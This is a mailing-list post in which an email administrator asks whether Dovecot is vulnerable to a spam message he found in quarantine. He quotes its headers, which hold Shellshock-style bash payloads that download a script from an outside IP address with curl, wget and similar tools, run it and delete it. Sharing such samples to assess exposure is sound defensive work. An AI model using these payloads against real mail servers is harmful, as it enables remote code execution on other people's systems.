I found an interesting email that got caught in my spam quarantine. I’m wondering if dovecot is vulnerable to this kind of code execution (I’m aware that other components could be vulnerable, but this question is specifically targeting dovecot).
The idea is to insert shell commands into various header fields that would get
executed as part of the message processing/delivery.
Examples include:
From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download
http: //62.75.175.145/ex...@nes.txt.com;,
w...@nes.txt.com, 62.75.175.145/ex...@nes.txt.com;,
fe...@nes.txt.com, 62.75.175.145/ex...@nes.txt.com;, s...@nes.txt.com,
ex...@nes.txt.com;, r...@nes.txt.com, -f...@nes.txt.com,
ex.*'@nes.txt.com, &@nes.txt.com;
Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO
62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget
62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 62.75.175.145/ex.sh;lwp-download
http://62.75.175.145/ex.sh;wget 62.75.175.145/ex.sh;fetch
62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO
62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget
62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
The full message, should it be of interest, can be found here:
https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt
Thank you!
--
Louis Kowolowski lou...@cryptomonkeys.org
Cryptomonkeys: http://www.cryptomonkeys.com/
Making life more interesting for people since 1977
signature.asc
Description: Message signed with OpenPGP using GPGMail
